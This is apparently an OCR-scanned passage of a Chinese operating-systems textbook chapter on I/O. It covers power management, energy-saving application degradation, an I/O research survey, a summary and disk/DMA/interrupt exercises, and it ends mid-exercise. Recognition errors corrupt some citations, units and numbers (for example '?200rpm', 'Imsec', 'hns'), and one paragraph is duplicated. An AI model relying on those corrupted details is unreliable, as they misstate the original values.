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电池 可 能 很 快 耗 干 。 另 一 方面 ， 如 果 无 线 电 设备 在 1 分 钟 空 闪 之 后 关闭 ， 那 么 就 可 能 会 错过 到 来 的 消息 ， 
这 显然 是 不 受 欢迎 的 。 

针对 这 一 问题 ，Kravets 和 Krishnan (1998) 提出 了 一 种 有 效 的 解决 方案 。 他 们 的 解决 方案 的 核心 利 
用 了 这 样 的 事实 ， 即 移动 的 计算 机 是 与 固定 的 基站 通信 ， 而 固定 基站 具有 大 容量 的 内 存 与 磁盘 并 且 没 有 
电源 限制 。 他 们 的 解决 方案 是 当 移 动 计算 机 将 要 关闭 无 线 电 设 备 时 ， 让 移动 计算 机 发 送 一 条 消息 到 基站 。 
从 那 时 起 ， 基 站 在 其 磁盘 上 缓冲 到 来 的 消息 。 当 移动 计算 机 再 次 打开 无 线 电 设备 时 ， 它 会 通知 基站 。 此 
刻 ， 所 有 积累 的 消息 可 以 发 送 给 移动 计算 机 。 

当 无 线 电 设备 关闭 时 ， 生 成 的 外 发 的 消息 可 以 在 移动 计算 机 上 缓冲 。 如 果 缓 冲 区 有 填 满 的 危险 ， 可 
以 将 无 线 电 设备 打开 并 且 将 排队 的 消息 发 送 到 基站 。 

应 该 在 何 时 将 无 线 电 设备 关闭 ?一 种 可 能 是 让 用 户 或 应 用 程序 来 决定 。 另 一 种 方法 是 在 若干 秒 的 空 
闲 时 间 之 后 将 其 关闭 。 应 该 在 何 时 将 无 线 电 设备 再 次 打开 ?用 户 或 应 用 程序 可 以 再 一 次 做 出 决定 ， 或 者 
可 以 周期 性 地 将 其 打开 以 检查 到 来 的 消息 并 且 发 送 所 有 排队 的 消息 。 当 然 ， 当 输出 缓冲 区 接近 填 满 时 也 
应 该 将 其 打开 。 各 种 各 样 的 其 他 休眠 方法 也 是 可 能 的 。 

802.11 (wifi) 网 络 中 就 有 一 个 用 无 线 网 络 支持 此 类 电源 管理 框架 的 例子 。 在 802.11 中 ， 移 动 计 算 
机 可 以 通知 接 入 点 它 即将 睡眠， 不 过 可 以 在 基站 发 送信 号 包 之 前 醒 来 。 这 些 接 入 点 会 周期 性 的 发 送 包 ， 
并 在 发 包 的 同时 告诉 移动 计算 机 是 否 有 数据 等 待 处 理 。 如 果 没 有 数据 ， 移 动 计算 机 会 再 次 进入 睡眠 直到 
下 一 个 信号 包 到 来 。 

6. 热量 管理 

一 个 有 一 点 不 同 但 是 仍然 与 能 量 相关 的 问题 是 热量 管理 。 现 代 CPU 由 于 高 速度 而 会 变 得 非常 热 。 桌 
面 计算 机 通常 拥有 一 个 内 部 电 风 遍 将 热 空气 吹出 机 箱 。 由 于 对 于 桌面 计算 机 来 说 减少 功率 消耗 通常 并 不 
是 一 个 重要 的 问题 ， 所 以 风扇 通常 是 始终 开 着 的 。 

对 于 笔记 本 电脑 ， 情 况 是 不 同 的 。 操 作 系 统 必须 连续 地 监视 温度 ， 当 温度 接近 最 大 可 人 允许 温度 时 ， 
操作 系统 可 以 选择 打开 风扇 ， 这 样 会 发 出 噪音 并 且 消 耗 电 能 。 作 为 替代 ， 它 也 可 以 借助 于 降低 屏幕 背光 、 
放 慢 CPU 速度 、 更 为 激进 地 关闭 磁盘 等 来 降低 功率 消耗 。 

来 自用 户 的 某 些 输入 也 许 是 颇 有 价值 的 指导 。 例 如 ， 用 户 可 以 预先 设 定 风 扇 的 噪音 是 令 人 不 快 的 ， 
因而 操作 系统 将 选择 降低 功率 消耗 。 

支持 这 种 能 耗 管理 方案 的 无 线 技术 的 例子 可 以 在 802.11 (WiFi) 网 络 中 找到 。 在 802.11 中 ， 一 台 移 
动 计算 机 可 以 通知 接 入 点 它 将 进入 睡眠 ， 但 是 它 将 在 基站 发 送 下 一 个 信 标 帧 之 前 醒 来 。 接 人 点 会 周期 性 
地 发 出 这 样 的 帧 。 此 刻 ， 接 入 点 可 以 通知 移动 计算 机 它 有 数据 待 处 理 。 如 果 没 有 待 处 理 的 数据 ， 移 动 计 
算 机 可 以 再 次 睡眠 ， 直 到 下 一 个 信 标 帧 。 

7. 电池 管理 

在 过 去 ， 电 池 仅 仅 提 供电 流 直到 其 耗 干 ， 在 耗 干 时 电池 就 不 会 再 有 电 了 。 现 在 笔记 本 电脑 使 用 的 是 
智能 电池 ， 它 可 以 与 操作 系统 通信 。 在 请 求 时 ， 它 可 以 报告 其 状况 ， 例 如 最 大 电压 、 当 前 电压 、 最 大 负 
荷 、 当 前 负荷 、 最 大 消耗 速率 、 当 前 消耗 速率 等 。 大 多 数 笔记 本 电脑 拥有 能 够 查询 与 显示 这 些 参数 的 程 
序 。 在 操作 系统 的 控制 下 ， 还 可 以 命令 智能 电池 改变 各 种 工作 参数 。 

某 些 笔记 本 电脑 拥有 多 块 电池 。 当 操作 系统 检测 到 一 块 电池 将 要 用 完 时 ， 它 必须 适度 地 安排 转换 到 
下 一 块 电 池 ， 在 转换 期 间 不 能 导致 任何 故障 。 当 最 后 一 块 电池 濒临 耗 尽 时 ， 操 作 系 统 要 负责 向 用 户 发 出 
警告 然后 促成 有 序 的 关机 ， 例 如 ， 确 保 文 件 系统 不 被 破坏 。 

8. 驱动 程序 接口 

Windows 系 统 拥 有 一 个 进行 电源 管理 的 精巧 的 机 制 ， 称 为 ACPI (Advanced Configuration and 
Power Interface， 高 级 配置 与 电源 接口 ) 。 操 作 系 统 可 以 向 任何 符合 标准 的 驱动 程序 发 出 命令 ， 要 求 它 报 
告 其 设备 的 性 能 以 及 它们 当前 的 状态 。 当 与 即 插 即 用 相 结合 时 ， 该 特性 尤其 重要 ， 因 为 在 系统 刚刚 引导 
之 后 ， 操 作 系 统 甚至 还 不 知道 存在 什么 设备 ， 更 不 用 说 它们 关于 能 量 消 耗 或 电源 管理 的 属性 了 。 

ACPI 还 可 以 发 送 命 令 给 驱动 程序 ， 命令 它们 削减 其 功 耗 水 平 (当然 要 基于 早先 获悉 的 设备 性 能 )。 
还 存在 某 些 其 他 方式 的 通信 。 特 别 地 ， 当 一 个 设备 (例如 键盘 或 鼠标 ) 在 经 历 了 一 个 时 期 的 空闲 之 后 检 
测 到 活动 时 ， 这 是 一 个 信号 让 系统 返回 到 (接近 ) 正常 运转 。 
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5.8.3 应 用 程序 问题 

到 目前 为 止 ， 我 们 了 解 了 操作 系统 能 够 降低 各 种 类 型 的 设备 的 能 量 使 用 量 的 方法 。 但 是 ， 还 存在 着 
另 一 种 方法 : 指示 程序 使 用 较 少 的 能 量 ， 即 使 这 意味 着 提供 低劣 的 用 户 体验 (低劣 的 体验 也 比 电池 耗 干 
并 且 屏 幕 熄 灭 时 没有 体验 要 好 ) 。 一 般 情 况 下 ， 当 电池 的 电荷 低 于 某 个 装 值 时 传递 这 样 的 信息 ， 然 后 由 
应 用 程序 负责 在 退化 性 能 以 延长 电池 寿命 与 维持 性 能 并 且 冒 着 用 光电 池 的 危险 之 间作 出 决定 。 

这 里 出 现 的 一 个 问题 是 程序 怎样 退化 其 性 能 以 节省 能 量 ? Flinn 和 Satyanarayanan (2004) 研究 了 这 
一 问题 ， 他 们 提供 了 退化 的 性 能 怎样 能 够 节省 能 量 的 4 个 例子 。 我 们 现在 就 看 一 看 这 些 例子 。 

在 他 们 的 研究 中 ， 信 息 以 各 种 形式 呈现 给 用 户 。 当 退化 不 存在 时 ， 呈 现 的 是 最 优 可 能 的 信息 。 当 退化 存 
在 上 时， 呈现 给 用 户 的 信息 的 保 真 度 (准确 度 ) 比 它 能 够 达到 的 保 真 度 要 差 。 我 们 很 快 就 会 看 到 这 样 的 例子 。 

为 了 测量 能 量 使 用 量 ，Flinn 和 Satyanarayanan 发 明了 一 个 称 为 PowerScope 的 软件 工具 。PowerScope 
所 做 的 事情 是 提供 一 个 程序 的 电能 使 用 量 的 概要 剖析 。 为 了 使 用 PowerScope， 计 算 机 必须 通过 一 个 软件 
控制 的 数字 万 用 表 接 通 一 个 外 部 电源 。 使 用 万 用 表 ， 软 件 可 以 读 出 从 电源 流 进 的 电流 的 毫 安 数 ， 并 且 因 
此 确定 计算 机 正在 消耗 的 瞬时 功率 。PowerScope 所 做 的 工作 是 周期 性 地 采样 程序 计数 器 和 电能 使 用 量 并 
且 将 这 些 数据 写 到 一 个 文件 中 。 当 程序 终止 后 ， 对 文件 进行 分 析 就 可 以 给 出 每 个 过 程 的 能 量 使 用 量 。 这 
些 测 量 形 成 了 他 们 的 观察 结果 的 基础 。 他 们 还 利用 硬件 能 量 节约 测量 并 且 形 成 了 基准 线 ， 对 照 该 基准 线 
测量 了 退化 的 性 能 。 

测量 的 第 一 个 程序 是 一 个 视频 播放 器 。 在 未 退化 模式 下 ， 播 放 器 以 全 分 辨 率 和 彩色 方式 每 秒 播放 30 
帧 。 一 种 退化 形式 是 舍弃 彩色 信息 并 且 以 黑白 方式 显示 视频 。 另 一 种 退化 形式 是 降低 帧 速率 ， 这 会 导致 
内 烁 并 且 使 电影 呈现 抖动 的 质量 。 还 有 一 种 退化 形式 是 在 两 个 方向 上 减少 像素 数目 ， 或 者 是 通过 降低 空 
. 间 分 辩 率 ， 或 者 是 使 显示 的 图 像 更 小 。 对 这 种 类 型 的 测量 表明 节省 了 大 约 30% 的 能 量 。 

第 二 个 程序 是 一 个 语音 识别 器 ， 它 对 麦克 风 进 行 采样 以 构造 波形 。 该 波形 可 以 在 笔记 本 电脑 上 进行 分 
析 ， 也 可 以 通过 无 线 链 路 发 送 到 固定 计算 机 上 进行 分 析 ， 这 样 做 节省 了 CPU 消耗 的 能 量 但 是 会 为 无 线 电 设 
备 而 消耗 能 量 。 通 过 使 用 比较 小 的 词汇 量 和 比较 简单 的 声学 模型 可 以 实现 退化 ， 这 样 做 的 收益 大 约 是 35% 。 

第 三 个 例子 是 一 个 通过 无 线 链 路 获取 地 图 的 地 图 观察 器 。 退 化 在 于 或 者 将 地 图 修剪 到 比较 小 的 尺度 ， 
或 者 告诉 远程 服务 器 省 略 比较 小 的 道路 ， 从 而 需要 比较 少 的 位 来 传输 。 这 样 获得 的 收益 大 约 也 是 35% 。 

第 四 个 实验 是 传送 JPEG 图 像 到 一 个 Web 浏 览 器 。JPEG 标 准 允许 各 种 算法 ， 在 图 像 质量 与 文件 大 小 
之 间 进行 中 。 这 里 的 收益 平均 只 有 9%。 总 而 言 之 ， 实 验 表 明 通 过 接受 一 些 质量 退化 ， 用 户 能 够 在 一 个 
给 定 的 电池 上 运行 更 长 的 时 间 。 


5.9 有 关 输 入 /输出 的 研究 

关于 输入 /输出 存在 着 相当 数量 的 研究 ， 其 中 一 些 研究 集中 在 特定 的 设备 上 ， 而 不 是 一 般 性 的 IO 。 
另外 一 些 研究 工作 关注 的 是 输入 /输出 的 底层 结构 。 比 如 ， 使 用 流水 线 结构 来 构建 面向 特定 应 用 的 输入 / 
输出 系统 ， 减 少 复制 、 切 换 上 下 文 、 发 送信 号 以 及 缓存 和 TLB 利 用 不 充分 带 来 的 额外 开销 (DeBruijn 等 
人 ，2011)。 它 建立 在 Beltway Buffers 一 一 一 种 高 级 环 式 缓存 的 概念 上 ， 要 比 目 前 存在 的 缓存 系统 更 加 
高 效 (DeBruijn 和 Bos，2008)。 流 水 线 结构 对 于 网 络 要 求 高 的 应 用 尤其 适用 。Megapipe (Han $A, 
2012) 是 另 一 个 面向 基于 消息 负载 的 网 络 输 入 /输出 结构 。 它 在 内 核 空间 和 用 户 空 间 之 间 建 立 了 每 个 核 
心 的 双向 通道 ， 在 这 种 结构 下 系统 层 被 抽象 成 像 是 轻 量 的 sockets。sockets 并 不 完全 适合 POSIX 的 标准 ， 
因此 应 用 程序 需要 适应 这 种 更 加 高 效 的 输入 /输出 ， 并 从 中 获 益 。 

人 们 的 研究 目的 经 常 是 改善 某 个 特定 设备 某 方 面 的 表现 。 磁 盘 系 统 便 是 一 个 典型 的 例子 。 磁 盘 臂 调 
度 算法 曾经 是 一 个 流行 的 研究 领域 。 一 些 研究 的 重点 是 提升 性 能 (Gonzalez-Fere 等 人 ，2012， 
Prabhakar FA, 2013, Zhang 等 人 ，2012b)， 而 另 一 些 研究 的 重点 是 降低 能 耗 (Krish 等 人 ，2013， 
Nijim 等 人 ，2013; Zhang 等 人 ，2012a)。 随 着 越 来 越 多 服务 器 端 整合 使 用 虚拟 机 ， 针 对 虚拟 系统 的 磁 
盘 调 度 已 成 为 一 个 热点 (Jin 等 人 ，2013，Ling 等 人 ，2012)。 

然而 并 非 所 有 的 课题 都 是 新 的 ，RAID 作 为 一 个 古老 的 课题 仍然 受到 很 多 关注 (Chen $A, 2013; . 
Moon 和 Reddy，2013; Timcenko 和 Djordjevic，2013)， 同 样 还 有 SSD (Dayan 等 人 ，2013，Kim $A, 
2013, Luo 等 人 ，2013)。 在 理论 层面 ,一些 研究 者 正在 研究 模型 化 磁盘 系统 ， 借 此 更 好 地 了 解 不 同 负 
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载 下 的 性 能 情况 (Li SA, 2013b; Shen#Qi, 2013), 

磁盘 不 是 唯一 受 关注 的 输入 /输出 设备 。 另 一 个 与 输入 /输出 相关 的 关键 研究 领域 是 网 络 。 相 关 问 题 
包括 能 耗 (Hewage 和 Voigt, 2013; Hogue 等 人 ，2013)、 服 务 质量 (Gupta，2013; Hemkumar 和 
Vinaykumar，2012; LaiffiTang, 2013) 以 及 性 能 (Han 等 人 ,2012; Soorty, 2012), 

考虑 到 为 数 众 多 的 计算 机 科学 家 都 在 使 用 笔记 本 电脑 ， 并 且 考 虑 到 大 多 数 笔记 本 电脑 微不足道 的 电 
池 寿 命 ， 那 么 看 到 在 利用 软件 技术 减少 电能 消耗 方面 存在 巨大 的 研究 兴趣 就 不 足 为 奇 了 。 相 关 的 研究 包 
括 : 调整 每 个 核心 的 时 钟 频率 ， 使 得 在 节省 能 耗 的 同时 保证 良好 的 性 能 (Hruby 2013) ; 能 耗 利用 与 服 
务 质 量 (Holmbacka 等 人 ，2013) ， 实 时 能 耗 估算 (Dutta 等 人 ，2013)， 提 供 系统 服务 来 管理 能 耗 
(Weissel，2012) ， 安 全 方面 的 能 耗 开 销 (Kabri 和 Seret, 2009) ， 以 及 多 媒体 调度 (Wei 等 人 ，2010 ) 。 

当然 也 不 是 所 有 人 都 对 笔记 本 电脑 感 兴趣 。 一 些 学 者 在 考虑 如 何 为 数据 中 心 节 省 兆 瓦 级 的 能 耗 
(Fetzer 和 Knauth，2012，Schwartz 等 人 ，2012，wang 等 人 ，2013b，Yuan 等 人 ，2012 ) 。 

换 一 个 角度 ， 一 个 很 受 关 注 的 话题 是 传 感 网 络 中 的 能 耗 (Albath A, 2013; Mikhaylov 和 
Tervonen ，2013，Rasaneh 和 Banirostam，2013 ，Severini 等 人 ，2012 ) 。 

稍稍 让 人 吃惊 的 是 ， 身 份 低 下 的 时 钟 仍 然 是 研究 的 主题 。 为 了 提供 更 好 的 分 辩 率 ， 某 些 操作 系统 在 
1000Hz 的 时 钟 下 运行 ， 这 会 导致 相当 大 的 开销 。 摆 脱 这 一 开销 正 是 新 兴 的 研究 课题 (Tsafir 等 人 ，2005)。 

类 似 的 ， 中 断 延 迟 同样 是 一 些 研究 小 组 关心 的 话题 ， 特 别 在 实时 操作 系统 领域 。 因 为 问题 经 常 来 自 
于 一 些 关键 系统 (比如 控制 刹车 和 转向 的 系统 )， 通 过 只 在 一 些 特定 的 “抢占 点 ”允许 中 断 发 生 ， 使 得 
系统 能 够 控制 可 能 出 现 的 中 断 处 理 ， 并 可 以 使 用 形式 化 验证 来 提高 可 靠 性 (Blackham 等 人 ，2012) 。 

设备 驱动 同样 是 一 个 非常 活跃 的 研究 领域 。 很 多 操作 系统 崩溃 的 原因 都 是 驱动 程序 存在 bug。 在 
Symdrive 中 ， 作 者 给 出 了 一 个 设备 驱动 测试 框架 ， 可 以 不 用 实际 运行 设备 (Renzelmann FA, 2012), 
另 一 个 解决 方案 是 通过 形式 化 说 明 来 自动 生成 设备 驱动 ， 这 样 产生 bug 的 可 能 性 很 小 ， 由 Rhyzik 等 人 
(2009) 提出 。 

瘦 客 户 端 也 是 一 个 有 趣 的 主题 ， 特 别 是 用 移动 设备 连接 到 云端 (Hocking, 2011，Tuan-Anh 等 人 ， 
2013), 。 最 后 ， 还 有 一 些 论文 研究 的 主题 比较 罕见 ， 比 如 将 建筑 作为 大 型 输入 /输出 设备 (Dawson- 
Haggerty A, 2013), 


5.10 小 结 


输入 /输出 是 一 个 经 常 被 忽略 但 是 十 分 重要 的 话题 。 任 何 一 个 操作 系统 都 有 大 量 的 组 分 与 IO 有 关 。 
IO 可 以 用 三 种 方式 来 实现 。 第 一 是 程序 控制 IO ， 在 这 种 方式 下 主 CPU 输 入 或 输出 每 个 字 节 或 字 并 且 闲 
置 在 一 个 密封 的 循环 中 等 待 ， 直 到 它 能 够 获得 或 者 发 送 下 一 个 字 节 或 字 。 第 二 是 中 断 驱动 的 HO， 在 这 
种 方式 下 CPU 针对 一 个 字 节 或 字 开始 IO 传送 并 且 离 开 去 做 别 的 事情 ， 直 到 一 个 中 断 到 来 发 出 信号 通知 
IO 完成 。 第 三 是 DMA ， 在 这 种 方式 下 有 一 个 单独 的 芯片 管理 着 一 个 数据 块 的 完整 传送 过 程 ， 只 有 当 整 
个 数据 块 完成 传送 时 才 引 发 一 个 中 断 。 

IO 可 以 组 织 成 4 个 层次 : 中 断 服 务 程 序 、 设 备 驱动 程序 、 与 设备 无 关 的 IO 软件 和 运行 在 用 户 空间 
的 IO 库 与 假 脱 机 程序 。 设 备 驱 动 程序 处 理 运 行 设备 的 细节 并 且 向 操作 系统 的 其 余部 分 提供 统一 的 接口 。 
与 设备 无 关 的 IO 软件 做 类 似 缓冲 与 错误 报告 这 样 的 事情 。 

盘 具 有 多 种 类 型 ， 包 括 磁盘 、RAID 和 各 类 光盘 。 磁 盘 和 臂 调 度 算法 经 常用 来 改进 磁盘 性 能 ， 但 是 虚 
拟 几何 规格 的 出 现 使 事情 变 得 十 分 复杂 。 通 过 将 两 块 磁盘 组 成 一 对 ， 可 以 构造 稳定 的 存储 介质 ， 具 有 某 
些 有 用 的 性 质 。 

时 钟 可 以 用 于 跟踪 实际 时 间 ， 限 制 进程 可 以 运行 多 长 时 间 ， 处 理 监视 定时 器 ， 以 及 进行 记 账 。 

面向 字符 的 终端 具有 多 种 多 样 的 问题 ， 这 些 问题 涉及 特殊 的 字符 如 何 输入 以 及 特殊 的 转 义 序列 如 何 
输出 。 输 入 可 以 采用 原始 模式 或 加 工 模式 ， 取 决 于 程序 对 于 输入 需要 有 多 少 控制 。 针 对 输出 的 转 义 序列 
控制 着 光标 的 移动 并 且 人 允许 在 屏幕 上 插入 和 删除 文本 。 

大 多 数 UNIX 系 统 使 用 X 窗 口 系统 作为 用 户 界面 的 基础 。 它 包含 与 特殊 的 库 相 绑 定 并 发 出 绘图 命令 
的 程序 ， 以 及 在 显示 器 上 执行 绘图 的 服务 器 。 

许多 个 人 计算 机 使 用 GUI 作为 它们 的 输出 。GUI 基 于 WIMP 范 式 : 窗口 、 图 标 、 菜 单 和 定点 设备 。 
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基于 GUI 的 程序 一 般 是 事件 驱动 的 ， 当 键盘 事件 、 鼠 标 事 件 和 其 他 事件 发 生 时 立刻 会 被 发 送 给 程序 以 便 
处 理 。 在 UNIX 系 统 中 ，GUI 几 乎 总 是 运行 在 X 之 上 。 
瘦 客户 机 与 标准 PC 相 比 具有 某 些 优势 ， 对 用 户 而 言 ， 值 得 注意 的 是 简单 性 并 且 需 要 较 少 维护 。 
最 后 ,电源 管理 对 于 手机 、 平板 电脑 和 笔记 本 电脑 来 说 是 一 个 主要 的 问题 因为 电池 寿命 是 有 限 的 ， 
而 对 台式 机 和 服务 器 则 意味 着 机 构 的 电费 账单 。 操 作 系统 可 以 采用 各 种 技术 来 减少 功率 消耗 。 通 过 牺牲 
某 些 质 量 以 换取 更 长 的 电 字 寿命 ， 应 用 程序 也 可 以 做 出 贡献 。 


习题 

1. 芯片 技术 的 发 展 已 经 使 得 将 整个 控制 器 包括 所 
有 总 线 访问 逻辑 放 在 一 个 便宜 的 芯片 上 成 为 可 
能 。 这 对 于 图 1-6 的 模型 具有 什么 影响 ? 

.已 知 图 5-1 列 出 的 速度 ， 是 否 可 能 以 全 速 从 一 台 
扫描 仪 扫描 文档 并 且 通 过 802.11g 网 络 对 其 进行 
传输 ?请 解释 你 的 答案 。 

.图 5-3b 显 示 了 即使 在 存在 单独 的 总 线 用 于 内 存 
和 用 于 I/O 设 备 的 情况 下 使 用 内 存 映 射 1/0 的 一 
种 方法 ， 也 就 是 说 ， 首 先 尝 试 内 存 总 线 ， 如 果 
失败 则 尝试 IO 总 线 。 一 名 聪明 的 计算 机 科学 专 
业 的 学 生 想 出 了 一 个 改进 办 法 : 并 行 地 尝试 两 
个 总 线 ， 以 加 快 访问 IO 设备 的 过 程 。 你 认为 这 
个 想法 如 何 ? 

.请 解释 超标 量 体 系 结构 是 如 何 权衡 精确 中 断 与 
非 精 确 中 断 的 ? 

.一 个 DMA 控 制 器 具有 五 个 通道 。 控 制 器 最 快 可 
以 每 40nsec 请 求 一 个 32 bit 的 数据 ， 请 求 响应 时 
间 也 是 40nsec。 请 问 在 这 种 情形 下 ， 总 线 传输 
速度 要 多 快 才 不 会 成 为 传输 瓶颈 。 

.假设 一 个 系统 使 用 DMA 将 数据 从 磁盘 控制 器 传 
送 到 内 存 。 进 一 步 假设 平均 花费 hns 获 得 总 线 ， 
并 且 花 费 bns 在 总 线 上 传送 一 个 字 (1,>>t,)。 在 
CPU 对 DMA 控 制 器 进行 编程 之 后 ， 如 果 (a) 
采用 一 次 一 字模 式 ，(b) 采用 突 发 模式 ， 从 磁 
盘 控 制 器 到 内 存 传送 1000 个 字 需 要 多 少时 间 ? 
假设 向 磁盘 控制 器 发 送 命令 需要 获取 总 线 以 传 
输 一 个 字 ， 并 且 应 答 传输 也 需要 获取 总 线 以 传 
输 一 个 字 。 

.一 些 DMA 控 制 器 采用 这 样 的 模型 : 对 每 个 要 传 
输 的 字 ， 首 先 让 设备 驱动 传输 数据 给 DMA 控 制 
器 ， 然 后 再 第 二 次 发 起 总 线 请 求 将 数据 写 入 内 
存 。 如 何 使 用 这 种 模型 进行 内 存 到 内 存 的 复 
制 ? 这 种 方式 与 使 用 CPU 进 行内 存 复制 的 方式 
相 比 具有 哪些 优点 和 缺点 ? 

8. 假设 一 台 计 算 机 能 够 在 5ns 内 读 或 者 写 一 个 内 存 
字 ， 并 且 假 设 当中 断 发 生 时 ， 所 有 32 位 寄存 器 
连同 程序 计数 器 和 PSW 被 压 和 堆栈 。 该 计算 机 
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每 秒 能 够 处 理 的 中 断 的 最 大 数目 是 多 少 ? 


9. CPU 体系 结构 设计 师 知 道 操作 系统 开发 者 痛恨 
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非 精确 的 中 断 。 满 足 OS 开 发 者 的 一 种 方法 是 当 
得 到 一 个 中 断 信号 通知 时 ， 让 CPU 停止 发 射 指 
令 ， 但 是 允许 当前 正在 执行 的 指令 完成 ， 然 后 
强制 中 断 。 这 一 方案 是 否 有 缺点 ? 请 解释 你 的 
答案 。 

.在 图 5-9b 中 ， 中 断 直到 下 一 个 字符 输出 到 打印 
机 之 后 才 得 到 应 答 。 中 断 在 中 断 服务 程序 开始 
时 立刻 得 到 应 答 是 否 同样 可 行 ? 如 果 是 ， 请 给 
出 像 本 书 中 那样 在 中 断 服 务 程序 结束 时 应 答 中 
断 的 一 个 理由 。 如 果 不 是 ， 为 什么 ? 

.一 台 计 算 机 具有 如 图 1-7a 所 示 的 三 级 流水 线 。 
在 每 一 个 时 钟 周 期 ， 一 条 新 的 指令 从 PC 所 指向 
的 内 存 地 址 中 取出 并 放 入 流水 线 ， 同 时 PC 值 增 
加 。 每 条 指令 怡 好 占据 一 个 内 存 字 。 已 经 在 流 
水 线 中 的 指令 每 个 时 钟 周期 前 进 一 级 。 当 中 断 
发 生 时 ， 当 前 PC 压 和 堆栈， 并 且 将 PC 设置 为 
中 断 处 理 程序 的 地 址 。 然 后 ， 流 水 线 右 移 一 级 
并 且 中 断 处 理 程序 的 第 一 条 指令 被 取 入 流水 
线 。 该 机 器 具有 精确 中 断 吗 ? 请 解释 你 的 答案 。 
.一 个 典型 的 文本 打印 页 面包 含 50 行 ， 每 行 80 个 
字符 。 设 想 某 一 台 打 印 机 每 分 钟 可 以 打印 6 个 
页 面 ， 并 且 将 字符 写 到 打印 机 输出 寄存 器 的 时 
间 很 短 以 至 于 可 以 忽略 。 如 果 打 印 每 一 个 字符 
要 请 求 一 次 中 断 ， 而 进行 中 断 服务 要 花费 总 计 
50us 的 时 间 ， 那 么 使 用 中 断 驱动 的 IO 来 运行 
该 打印 机 有 没有 意义 ? 

.请 解释 OS 如 何 帮助 安装 新 的 驱动 程序 而 无 须 
重新 编译 OS 。 

.以 下 各 项 工作 是 在 四 个 IO 软件 层 的 哪 一 层 完 
成 的 ? 

(a) 为 一 个 磁盘 读 操作 计算 磁道 、 遍 区、 磁头。 
(b) 向 设备 寄存 器 写 命令 。 

(c) 检查 用 户 是 否 允 许 使 用 设备 。 

(d) 将 二 进 制 整数 转换 成 ASCII 码 以 便 打印 。 
.一 个 局 域 网 以 如 下 方式 使 用 : 用 户 发 出 一 个 系 
统 调用 ， 请 求 将 数据 包 写 到 网 上 ， 然 后 操作 系 
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统 将 数据 复制 到 一 个 内 核 缓冲 区 中 ， 再 将 数据 
复制 到 网 络 控制 器 接口 板 上 。 当 所 有 数据 都 安 
全 地 存放 在 控制 器 中 时 ， 再 将 它们 通过 网 络 以 
10Mb/s 的 速率 发 送 。 在 每 一 位 被 发 送 后 ， 接 收 
的 网 络 控制 器 以 每 微 秒 一 位 的 速率 保存 它们 。 
当 最 后 一 位 到 达 时 ， 目 标 CPU 被 中 断 ， 内 核 将 
新 到 达 的 数据 包 复 制 到 内 核 缓冲 区 中 进行 检 
查 。 一 旦 判明 该 数据 包 是 发 送 给 哪个 用 户 的 ， 
内 核 就 将 数据 复制 到 该 用 户 空间 。 如 果 我 们 假 
设 每 一 个 中 断 及 其 相关 的 处 理 过 程 花费 Ims 时 
间 ， 数 据 包 为 1024 字 节 (忽略 包头 )， 并 且 复 
制 一 个 字 节 花费 1us 时 间 ， 那 么 将 数据 从 一 个 
进程 转 储 到 另 一 个 进程 的 最 大 速率 是 多 少 ? 假 
设 发 送 进程 被 阻塞 直到 接收 端 结束 工作 并 且 返 
回 一 个 应 答 。 为 简单 起 见 ， 假 设 获得 返回 应 答 
的 时 间 非 常 短 ， 可 以 忽略 不 计 。 

16. 为 什么 打印 机 的 输出 文件 在 打印 前 通常 都 假 脱 
机 输出 在 磁盘 上 ? 

17. 一 个 7200rpm 的 磁盘 的 磁道 寻 道 时 间 为 Imsec， 
该 磁盘 相 邻 柱 面 起 始 位 置 的 偏 移 角 度 是 多 少 ? 
磁盘 的 每 个 磁道 包含 200 个 遍 区 ， 每 个 扇 区 大 
小 为 512B 。 

18. 一 个 磁盘 的 转速 为 ?200rpm， 一 个 柱 面 上 有 
500 个 扇 区 ， 每 个 扇 区 大 小 为 512B 。 读 入 一 个 
启 区 需要 多 少时 间 ? 

19. 计算 上 题 所 述 磁盘 的 最 大 数据 传输 率 。 

20. 3 级 RAID 只 使 用 一 个 奇偶 驱动 器 就 能 够 纠正 一 
位 错误 。 那 么 2 级 RAID 的 意义 是 什么 ?毕竟 2 级 
RAID 也 只 能 纠正 一 位 错误 而 且 需 要 更 多 的 驱 
动 器 。 

21. 如 果 两 个 或 更 多 的 驱动 器 在 很 短 的 时 间 内 崩 
溃 ， 那 么 RAID 就 可 能 失效 。 假 设 在 给 定 的 一 
小 时 内 一 个 驱动 器 崩溃 的 概率 是 p， 那 么 在 给 
定 的 一 小 时 内 具有 Kk 个 驱动 器 的 RAID 失 效 的 概 
率 是 多 少 ? 

22. 从 读 性 能 、 写 性 能 、 空 间 开销 以 及 可 靠 性 方面 
对 0 级 RAID 到 5 级 RAID 进 行 比 较 。 

23. 1ZB 等 于 多 少 PB? 

24. 为 什么 光 存 储 设备 天 生地 比 磁 存 储 设备 具有 更 
高 的 数据 密度 ?注意 : 本 题 需要 某 些 高 中 物理 
以 及 磁场 是 如 何 产生 的 知识 。 

25. 光盘 和 磁盘 的 优点 和 缺点 各 是 什么 ? 

26. 如 果 一 个 磁盘 控制 器 没有 内 部 缓冲 ， 一 旦 从 磁 
盘 上 接收 到 字 节 就 将 它们 写 到 内 存 中 ， 那 么 交 
错 编 号 还 有 用 吗 ? 请 讨论 你 的 答案 。 
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27. 如 果 一 个 磁盘 是 双 交错 编号 的 ， 那 么 该 磁盘 是 
否 还 需要 柱 面 斜 进 以 避免 在 进行 磁道 到 磁道 的 
寻 道 时 错过 数据 ? 请 讨论 你 的 答案 。 

- 考虑 一 个 包含 16 个 磁头 和 400 个 柱 面 的 磁盘 。 
该 磁盘 分 成 4 个 100 柱 面 的 区 域 ， 不 同 的 区 域 分 
别 包含 160 个 、200 个 、240 个 和 280 个 扇 区 。 假 
设 每 个 扇 区 包含 512 字 节 ， 相 邻 柱 面 间 的 平均 
寻 道 时 间 为 1ms， 并 且 磁 盘 转速 为 7200rpm。 
计算 磁盘 容量 、 最 优 磁道 斜 进 以 及 最 大 数据 传 
输 率 。 

.一 个 磁盘 制造 商 拥有 两 种 5.25 英 寸 的 磁盘 ， 每 
种 磁盘 都 具有 10 000 个 柱 面 。 新 磁盘 的 线性 记 
录 密 度 是 老 磁盘 的 两 倍 。 在 较 新 的 驱动 器 上 哪 
个 磁盘 的 特性 更 好 ， 哪 个 无 变化 ?新 的 是 否 具 
有 什么 劣势 ? 

:一 个 计算 机 制造 商 决定 重新 设计 Pentium 硬 盘 
的 分 区 表 以 提供 四 个 以 上 的 分 区 。 这 一 变化 有 
什么 后 果 ? 

. 磁盘 请 求 以 柱 面 10、22、20、2、40、6 和 38 的 
